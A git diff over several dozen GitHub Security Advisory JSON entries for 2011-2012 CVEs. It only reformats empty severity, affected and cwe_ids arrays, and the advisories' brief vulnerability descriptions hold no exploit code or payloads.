b/advisories/unreviewed/2022/05/GHSA-4jv2-g4w2-66wc/GHSA-4jv2-g4w2-66wc.json index 3c212524534..dc2b4a1694a 100644 --- a/advisories/unreviewed/2022/05/GHSA-4jv2-g4w2-66wc/GHSA-4jv2-g4w2-66wc.json +++ b/advisories/unreviewed/2022/05/GHSA-4jv2-g4w2-66wc/GHSA-4jv2-g4w2-66wc.json @@ -7,12 +7,8 @@ "CVE-2012-2164" ], "details": "The Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 allows remote authenticated users to bypass intended access restrictions, and use the Site Administration menu to modify system settings, via a parameter-tampering attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4m35-7rw5-2cp2/GHSA-4m35-7rw5-2cp2.json b/advisories/unreviewed/2022/05/GHSA-4m35-7rw5-2cp2/GHSA-4m35-7rw5-2cp2.json index 1ce62b41452..ccdbcbccb46 100644 --- a/advisories/unreviewed/2022/05/GHSA-4m35-7rw5-2cp2/GHSA-4m35-7rw5-2cp2.json +++ b/advisories/unreviewed/2022/05/GHSA-4m35-7rw5-2cp2/GHSA-4m35-7rw5-2cp2.json @@ -7,12 +7,8 @@ "CVE-2012-2760" ], "details": "mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4m7w-g6rc-g3w7/GHSA-4m7w-g6rc-g3w7.json b/advisories/unreviewed/2022/05/GHSA-4m7w-g6rc-g3w7/GHSA-4m7w-g6rc-g3w7.json index e40de47ef26..ab26cb0a7fd 100644 --- a/advisories/unreviewed/2022/05/GHSA-4m7w-g6rc-g3w7/GHSA-4m7w-g6rc-g3w7.json +++ b/advisories/unreviewed/2022/05/GHSA-4m7w-g6rc-g3w7/GHSA-4m7w-g6rc-g3w7.json @@ -7,12 +7,8 @@ "CVE-2012-1010" ], "details": "Unrestricted file upload vulnerability in actions.php in the AllWebMenus plugin before 1.1.8 for WordPress allows remote attackers to execute arbitrary PHP code by uploading a ZIP file containing a PHP file, then accessing it via a direct request to the file in an unspecified directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4mvc-h443-m66c/GHSA-4mvc-h443-m66c.json b/advisories/unreviewed/2022/05/GHSA-4mvc-h443-m66c/GHSA-4mvc-h443-m66c.json index e9ee3cde83d..9d7fe5d3eaf 100644 --- a/advisories/unreviewed/2022/05/GHSA-4mvc-h443-m66c/GHSA-4mvc-h443-m66c.json +++ b/advisories/unreviewed/2022/05/GHSA-4mvc-h443-m66c/GHSA-4mvc-h443-m66c.json @@ -7,12 +7,8 @@ "CVE-2012-1749" ], "details": "Unspecified vulnerability in the Oracle MapViewer component in Oracle Fusion Middleware 10.1.3.1 and 11.1.1.5 allows remote attackers to affect confidentiality via unknown vectors related to Oracle Maps.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4p57-32hf-84wc/GHSA-4p57-32hf-84wc.json b/advisories/unreviewed/2022/05/GHSA-4p57-32hf-84wc/GHSA-4p57-32hf-84wc.json index 51d4a3bf106..bb1a076a3e0 100644 --- a/advisories/unreviewed/2022/05/GHSA-4p57-32hf-84wc/GHSA-4p57-32hf-84wc.json +++ b/advisories/unreviewed/2022/05/GHSA-4p57-32hf-84wc/GHSA-4p57-32hf-84wc.json @@ -7,12 +7,8 @@ "CVE-2012-3733" ], "details": "Messages in Apple iOS before 6, when multiple iMessage e-mail addresses are configured, does not ensure that a reply's sender address matches the recipient address of the original message, which allows remote attackers to obtain potentially sensitive information about alternate e-mail addresses in opportunistic circumstances by reading a reply.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4p9w-hv3g-58rr/GHSA-4p9w-hv3g-58rr.json b/advisories/unreviewed/2022/05/GHSA-4p9w-hv3g-58rr/GHSA-4p9w-hv3g-58rr.json index 636699bb28d..5ab3fe65da2 100644 --- a/advisories/unreviewed/2022/05/GHSA-4p9w-hv3g-58rr/GHSA-4p9w-hv3g-58rr.json +++ b/advisories/unreviewed/2022/05/GHSA-4p9w-hv3g-58rr/GHSA-4p9w-hv3g-58rr.json @@ -7,12 +7,8 @@ "CVE-2012-1071" ], "details": "SQL injection vulnerability in the Kitchen recipe (mv_cooking) extension before 0.4.1 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, as exploited in the wild as of February 2012.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4pfr-fjxw-j2c5/GHSA-4pfr-fjxw-j2c5.json b/advisories/unreviewed/2022/05/GHSA-4pfr-fjxw-j2c5/GHSA-4pfr-fjxw-j2c5.json index c834f7a8bec..810851ac1e3 100644 --- a/advisories/unreviewed/2022/05/GHSA-4pfr-fjxw-j2c5/GHSA-4pfr-fjxw-j2c5.json +++ b/advisories/unreviewed/2022/05/GHSA-4pfr-fjxw-j2c5/GHSA-4pfr-fjxw-j2c5.json @@ -7,12 +7,8 @@ "CVE-2012-2696" ], "details": "The backend in Red Hat Enterprise Virtualization Manager (RHEV-M) before 3.1 does not properly check privileges, which allows remote authenticated users to query arbitrary information via a (1) SOAP or (2) GWT request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4q8w-45jp-f7gv/GHSA-4q8w-45jp-f7gv.json b/advisories/unreviewed/2022/05/GHSA-4q8w-45jp-f7gv/GHSA-4q8w-45jp-f7gv.json index 1959eb903fa..6afc5b2a42a 100644 --- a/advisories/unreviewed/2022/05/GHSA-4q8w-45jp-f7gv/GHSA-4q8w-45jp-f7gv.json +++ b/advisories/unreviewed/2022/05/GHSA-4q8w-45jp-f7gv/GHSA-4q8w-45jp-f7gv.json @@ -7,12 +7,8 @@ "CVE-2012-1017" ], "details": "Multiple SQL injection vulnerabilities in base_qry_main.php in Basic Analysis and Security Engine (BASE) 1.4.5 allow remote attackers to execute arbitrary SQL commands via the (1) ip_addr[0][1], (2) ip_addr[0][2], or (3) ip_addr[0][9] parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4qvv-4753-5fhg/GHSA-4qvv-4753-5fhg.json b/advisories/unreviewed/2022/05/GHSA-4qvv-4753-5fhg/GHSA-4qvv-4753-5fhg.json index d68e08be192..83b7236d442 100644 --- a/advisories/unreviewed/2022/05/GHSA-4qvv-4753-5fhg/GHSA-4qvv-4753-5fhg.json +++ b/advisories/unreviewed/2022/05/GHSA-4qvv-4753-5fhg/GHSA-4qvv-4753-5fhg.json @@ -7,12 +7,8 @@ "CVE-2012-1153" ], "details": "Unrestricted file upload vulnerability in addons/uploadify/uploadify.php in appRain CMF 0.1.5 and earlier allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the uploads directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4rc8-fprc-92jm/GHSA-4rc8-fprc-92jm.json b/advisories/unreviewed/2022/05/GHSA-4rc8-fprc-92jm/GHSA-4rc8-fprc-92jm.json index dbb6e240780..931da393961 100644 --- a/advisories/unreviewed/2022/05/GHSA-4rc8-fprc-92jm/GHSA-4rc8-fprc-92jm.json +++ b/advisories/unreviewed/2022/05/GHSA-4rc8-fprc-92jm/GHSA-4rc8-fprc-92jm.json @@ -7,12 +7,8 @@ "CVE-2012-2436" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via (1) an arbitrary parameter in a move or (2) minimize action to admin/admin_index.php; (3) the karma_username parameter to module.php in the karma module; (4) q_1_low, (5) q_1_high, (6) q_2_low, or (7) q_2_high parameter in a configure action to module.php in the captcha module; or (8) the edit parameter to module.php in the admin_language module.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4v8h-358m-9fvj/GHSA-4v8h-358m-9fvj.json b/advisories/unreviewed/2022/05/GHSA-4v8h-358m-9fvj/GHSA-4v8h-358m-9fvj.json index cfc57f5a0b6..52f8c328a7f 100644 --- a/advisories/unreviewed/2022/05/GHSA-4v8h-358m-9fvj/GHSA-4v8h-358m-9fvj.json +++ b/advisories/unreviewed/2022/05/GHSA-4v8h-358m-9fvj/GHSA-4v8h-358m-9fvj.json @@ -7,12 +7,8 @@ "CVE-2012-2115" ], "details": "SQL injection vulnerability in interface/login/validateUser.php in OpenEMR 4.1.0 and possibly earlier allows remote attackers to execute arbitrary SQL commands via the u parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4x53-c6rv-jmrr/GHSA-4x53-c6rv-jmrr.json b/advisories/unreviewed/2022/05/GHSA-4x53-c6rv-jmrr/GHSA-4x53-c6rv-jmrr.json index 9c9d46b243a..4940783aac8 100644 --- a/advisories/unreviewed/2022/05/GHSA-4x53-c6rv-jmrr/GHSA-4x53-c6rv-jmrr.json +++ b/advisories/unreviewed/2022/05/GHSA-4x53-c6rv-jmrr/GHSA-4x53-c6rv-jmrr.json @@ -7,12 +7,8 @@ "CVE-2012-2919" ], "details": "Directory traversal vulnerability in Upload/engine.php in Chevereto 1.9.1 allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in the v parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4xmv-ghqx-jmpq/GHSA-4xmv-ghqx-jmpq.json b/advisories/unreviewed/2022/05/GHSA-4xmv-ghqx-jmpq/GHSA-4xmv-ghqx-jmpq.json index 4332abf30d3..3ac6d857268 100644 --- a/advisories/unreviewed/2022/05/GHSA-4xmv-ghqx-jmpq/GHSA-4xmv-ghqx-jmpq.json +++ b/advisories/unreviewed/2022/05/GHSA-4xmv-ghqx-jmpq/GHSA-4xmv-ghqx-jmpq.json @@ -7,12 +7,8 @@ "CVE-2012-3588" ], "details": "Directory traversal vulnerability in preview.php in the Plugin Newsletter plugin 1.5 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the data parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5225-89r9-8698/GHSA-5225-89r9-8698.json b/advisories/unreviewed/2022/05/GHSA-5225-89r9-8698/GHSA-5225-89r9-8698.json index 956192314bc..54f99c7b000 100644 --- a/advisories/unreviewed/2022/05/GHSA-5225-89r9-8698/GHSA-5225-89r9-8698.json +++ b/advisories/unreviewed/2022/05/GHSA-5225-89r9-8698/GHSA-5225-89r9-8698.json @@ -7,12 +7,8 @@ "CVE-2012-2512" ], "details": "The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-53g7-46gp-g47p/GHSA-53g7-46gp-g47p.json b/advisories/unreviewed/2022/05/GHSA-53g7-46gp-g47p/GHSA-53g7-46gp-g47p.json index 1fad14d1ca5..46a1bf1345c 100644 --- a/advisories/unreviewed/2022/05/GHSA-53g7-46gp-g47p/GHSA-53g7-46gp-g47p.json +++ b/advisories/unreviewed/2022/05/GHSA-53g7-46gp-g47p/GHSA-53g7-46gp-g47p.json @@ -7,12 +7,8 @@ "CVE-2012-3721" ], "details": "Profile Manager in Apple Mac OS X before 10.7.5 does not properly perform authentication for the Device Management private interface, which allows attackers to enumerate managed devices via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-53jh-jfqq-xpqp/GHSA-53jh-jfqq-xpqp.json b/advisories/unreviewed/2022/05/GHSA-53jh-jfqq-xpqp/GHSA-53jh-jfqq-xpqp.json index 06ba24c1c40..ae8a98a6dad 100644 --- a/advisories/unreviewed/2022/05/GHSA-53jh-jfqq-xpqp/GHSA-53jh-jfqq-xpqp.json +++ b/advisories/unreviewed/2022/05/GHSA-53jh-jfqq-xpqp/GHSA-53jh-jfqq-xpqp.json @@ -7,12 +7,8 @@ "CVE-2012-3835" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in AlienVault Open Source Security Information Management (OSSIM) 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to top.php or (2) time[0][0] parameter to forensics/base_qry_main.php, which is not properly handled in an error page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-54gg-h38v-cpcg/GHSA-54gg-h38v-cpcg.json b/advisories/unreviewed/2022/05/GHSA-54gg-h38v-cpcg/GHSA-54gg-h38v-cpcg.json index b5f00b6daf2..94e30b0ab9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-54gg-h38v-cpcg/GHSA-54gg-h38v-cpcg.json +++ b/advisories/unreviewed/2022/05/GHSA-54gg-h38v-cpcg/GHSA-54gg-h38v-cpcg.json @@ -7,12 +7,8 @@ "CVE-2012-0976" ], "details": "Cross-site scripting (XSS) vulnerability in admin/EditForm in SilverStripe 2.4.6 allows remote authenticated users with Content Authors privileges to inject arbitrary web script or HTML via the Title parameter. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-54q7-fcx3-88wp/GHSA-54q7-fcx3-88wp.json b/advisories/unreviewed/2022/05/GHSA-54q7-fcx3-88wp/GHSA-54q7-fcx3-88wp.json index 8e27146dec3..1f85308de4d 100644 --- a/advisories/unreviewed/2022/05/GHSA-54q7-fcx3-88wp/GHSA-54q7-fcx3-88wp.json +++ b/advisories/unreviewed/2022/05/GHSA-54q7-fcx3-88wp/GHSA-54q7-fcx3-88wp.json @@ -7,12 +7,8 @@ "CVE-2012-3127" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect availability, related to SCTP.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-55gg-xp4m-w7g4/GHSA-55gg-xp4m-w7g4.json b/advisories/unreviewed/2022/05/GHSA-55gg-xp4m-w7g4/GHSA-55gg-xp4m-w7g4.json index 769c09874c2..f1a2394b9b6 100644 --- a/advisories/unreviewed/2022/05/GHSA-55gg-xp4m-w7g4/GHSA-55gg-xp4m-w7g4.json +++ b/advisories/unreviewed/2022/05/GHSA-55gg-xp4m-w7g4/GHSA-55gg-xp4m-w7g4.json @@ -7,12 +7,8 @@ "CVE-2012-2914" ], "details": "Cross-site scripting (XSS) vulnerability in captchademo.php in Unijimpe Captcha allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-55v4-fh45-vjcq/GHSA-55v4-fh45-vjcq.json b/advisories/unreviewed/2022/05/GHSA-55v4-fh45-vjcq/GHSA-55v4-fh45-vjcq.json index 9eaaf1ed334..fe8ce78e674 100644 --- a/advisories/unreviewed/2022/05/GHSA-55v4-fh45-vjcq/GHSA-55v4-fh45-vjcq.json +++ b/advisories/unreviewed/2022/05/GHSA-55v4-fh45-vjcq/GHSA-55v4-fh45-vjcq.json @@ -7,12 +7,8 @@ "CVE-2012-3716" ], "details": "CoreText in Apple Mac OS X 10.7.x before 10.7.5 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds write or read) via a crafted text glyph.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-566w-735r-v996/GHSA-566w-735r-v996.json b/advisories/unreviewed/2022/05/GHSA-566w-735r-v996/GHSA-566w-735r-v996.json index fa5c6ae7fbb..5c305e0f45e 100644 --- a/advisories/unreviewed/2022/05/GHSA-566w-735r-v996/GHSA-566w-735r-v996.json +++ b/advisories/unreviewed/2022/05/GHSA-566w-735r-v996/GHSA-566w-735r-v996.json @@ -7,12 +7,8 @@ "CVE-2012-2165" ], "details": "IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3, when ClearQuest Authentication is enabled, allows remote authenticated users to read password hashes via a user query.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-568w-ch6p-wvmf/GHSA-568w-ch6p-wvmf.json b/advisories/unreviewed/2022/05/GHSA-568w-ch6p-wvmf/GHSA-568w-ch6p-wvmf.json index b8cfbc279d1..a906b2f95a8 100644 --- a/advisories/unreviewed/2022/05/GHSA-568w-ch6p-wvmf/GHSA-568w-ch6p-wvmf.json +++ b/advisories/unreviewed/2022/05/GHSA-568w-ch6p-wvmf/GHSA-568w-ch6p-wvmf.json @@ -7,12 +7,8 @@ "CVE-2012-3317" ], "details": "IBM WebSphere Message Broker 6.1 before 6.1.0.11, 7.0 before 7.0.0.5, and 8.0 before 8.0.0.2 has incorrect ownership of certain uninstaller Java Runtime Environment (JRE) files, which might allow local users to gain privileges by leveraging access to uid 501 or gid 300.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-56gq-w62x-558w/GHSA-56gq-w62x-558w.json b/advisories/unreviewed/2022/05/GHSA-56gq-w62x-558w/GHSA-56gq-w62x-558w.json index 3c1be480301..f3e11d93273 100644 --- a/advisories/unreviewed/2022/05/GHSA-56gq-w62x-558w/GHSA-56gq-w62x-558w.json +++ b/advisories/unreviewed/2022/05/GHSA-56gq-w62x-558w/GHSA-56gq-w62x-558w.json @@ -7,12 +7,8 @@ "CVE-2011-4853" ], "details": "The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 includes an RFC 1918 IP address within a web page, which allows remote attackers to obtain potentially sensitive information by reading this page, as demonstrated by smb/user/list-data/items-per-page/ and certain other files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5822-f9hv-769j/GHSA-5822-f9hv-769j.json b/advisories/unreviewed/2022/05/GHSA-5822-f9hv-769j/GHSA-5822-f9hv-769j.json index 6caef0c3b97..af2b5906451 100644 --- a/advisories/unreviewed/2022/05/GHSA-5822-f9hv-769j/GHSA-5822-f9hv-769j.json +++ b/advisories/unreviewed/2022/05/GHSA-5822-f9hv-769j/GHSA-5822-f9hv-769j.json @@ -7,12 +7,8 @@ "CVE-2012-3719" ], "details": "Mail in Apple Mac OS X before 10.7.5 does not properly handle embedded web plugins, which allows remote attackers to execute arbitrary plugin code via an e-mail message that triggers the loading of a third-party plugin.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-582v-h4w6-q3j2/GHSA-582v-h4w6-q3j2.json b/advisories/unreviewed/2022/05/GHSA-582v-h4w6-q3j2/GHSA-582v-h4w6-q3j2.json index 8cfad803b4d..06e01941efb 100644 --- a/advisories/unreviewed/2022/05/GHSA-582v-h4w6-q3j2/GHSA-582v-h4w6-q3j2.json +++ b/advisories/unreviewed/2022/05/GHSA-582v-h4w6-q3j2/GHSA-582v-h4w6-q3j2.json @@ -7,12 +7,8 @@ "CVE-2012-2562" ], "details": "The Xelex MobileTrack application 2.3.7 and earlier for Android does not verify the origin of SMS commands, which allows remote attackers to execute a (1) LOCATE, (2) TRACK, (3) UPDATECFG, (4) UPDATEACCT, (5) STAT, (6) TERM, or (7) WIPE command via an SMS message.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-588m-jh6g-jgvm/GHSA-588m-jh6g-jgvm.json b/advisories/unreviewed/2022/05/GHSA-588m-jh6g-jgvm/GHSA-588m-jh6g-jgvm.json index a9cd56dbba6..92dd84b44b1 100644 --- a/advisories/unreviewed/2022/05/GHSA-588m-jh6g-jgvm/GHSA-588m-jh6g-jgvm.json +++ b/advisories/unreviewed/2022/05/GHSA-588m-jh6g-jgvm/GHSA-588m-jh6g-jgvm.json @@ -7,12 +7,8 @@ "CVE-2012-3563" ], "details": "Opera before 12.00 Beta allows remote attackers to cause a denial of service (application crash) via a web page that contains invalid character encodings.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-59cr-f6wj-285q/GHSA-59cr-f6wj-285q.json b/advisories/unreviewed/2022/05/GHSA-59cr-f6wj-285q/GHSA-59cr-f6wj-285q.json index d46928952fd..4be0f5e49dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-59cr-f6wj-285q/GHSA-59cr-f6wj-285q.json +++ b/advisories/unreviewed/2022/05/GHSA-59cr-f6wj-285q/GHSA-59cr-f6wj-285q.json @@ -7,12 +7,8 @@ "CVE-2012-2183" ], "details": "Session fixation vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack web sessions via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-59jh-p9m4-jw22/GHSA-59jh-p9m4-jw22.json b/advisories/unreviewed/2022/05/GHSA-59jh-p9m4-jw22/GHSA-59jh-p9m4-jw22.json index 10bfa84c7bd..5e08960f1bb 100644 --- a/advisories/unreviewed/2022/05/GHSA-59jh-p9m4-jw22/GHSA-59jh-p9m4-jw22.json +++ b/advisories/unreviewed/2022/05/GHSA-59jh-p9m4-jw22/GHSA-59jh-p9m4-jw22.json @@ -7,12 +7,8 @@ "CVE-2012-3321" ], "details": "IBM SmartCloud Control Desk 7.5 allows remote authenticated users to bypass intended access restrictions via vectors involving an expired password.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5c6j-76f2-jq69/GHSA-5c6j-76f2-jq69.json b/advisories/unreviewed/2022/05/GHSA-5c6j-76f2-jq69/GHSA-5c6j-76f2-jq69.json index 96ceaaeaa63..89dc34999ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-5c6j-76f2-jq69/GHSA-5c6j-76f2-jq69.json +++ b/advisories/unreviewed/2022/05/GHSA-5c6j-76f2-jq69/GHSA-5c6j-76f2-jq69.json @@ -7,12 +7,8 @@ "CVE-2012-2023" ], "details": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5c6w-jx22-cv5x/GHSA-5c6w-jx22-cv5x.json b/advisories/unreviewed/2022/05/GHSA-5c6w-jx22-cv5x/GHSA-5c6w-jx22-cv5x.json index 36830c8c5be..6cc347ebdf0 100644 --- a/advisories/unreviewed/2022/05/GHSA-5c6w-jx22-cv5x/GHSA-5c6w-jx22-cv5x.json +++ b/advisories/unreviewed/2022/05/GHSA-5c6w-jx22-cv5x/GHSA-5c6w-jx22-cv5x.json @@ -7,12 +7,8 @@ "CVE-2012-2385" ], "details": "The terminal dispatcher in mosh before 1.2.1 allows remote authenticated users to cause a denial of service (long loop and CPU consumption) via an escape sequence with a large repeat count value.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5c92-3wqx-h2c3/GHSA-5c92-3wqx-h2c3.json b/advisories/unreviewed/2022/05/GHSA-5c92-3wqx-h2c3/GHSA-5c92-3wqx-h2c3.json index 8cc789a366c..f24dc8552a2 100644 --- a/advisories/unreviewed/2022/05/GHSA-5c92-3wqx-h2c3/GHSA-5c92-3wqx-h2c3.json +++ b/advisories/unreviewed/2022/05/GHSA-5c92-3wqx-h2c3/GHSA-5c92-3wqx-h2c3.json @@ -7,12 +7,8 @@ "CVE-2012-1217" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in STHS v2 Web Portal 2.2 allow remote attackers to inject arbitrary web script or HTML via the team parameter to (1) prospects.php, (2) prospect.php, or (3) team.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5crq-wjvq-g8mx/GHSA-5crq-wjvq-g8mx.json b/advisories/unreviewed/2022/05/GHSA-5crq-wjvq-g8mx/GHSA-5crq-wjvq-g8mx.json index 76a2ca461e3..039c4355662 100644 --- a/advisories/unreviewed/2022/05/GHSA-5crq-wjvq-g8mx/GHSA-5crq-wjvq-g8mx.json +++ b/advisories/unreviewed/2022/05/GHSA-5crq-wjvq-g8mx/GHSA-5crq-wjvq-g8mx.json @@ -7,12 +7,8 @@ "CVE-2011-4849" ], "details": "The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies used by help.php and certain other files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5g25-2vp3-jgg2/GHSA-5g25-2vp3-jgg2.json b/advisories/unreviewed/2022/05/GHSA-5g25-2vp3-jgg2/GHSA-5g25-2vp3-jgg2.json index b1965f77323..43351a79eeb 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g25-2vp3-jgg2/GHSA-5g25-2vp3-jgg2.json +++ b/advisories/unreviewed/2022/05/GHSA-5g25-2vp3-jgg2/GHSA-5g25-2vp3-jgg2.json @@ -7,12 +7,8 @@ "CVE-2012-2927" ], "details": "The TM Software Tempo plugin before 6.4.3.1, 6.5.x before 6.5.0.2, and 7.x before 7.0.3 for Atlassian JIRA does not properly restrict the capabilities of third-party XML parsers, which allows remote authenticated users to cause a denial of service (resource consumption) via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + 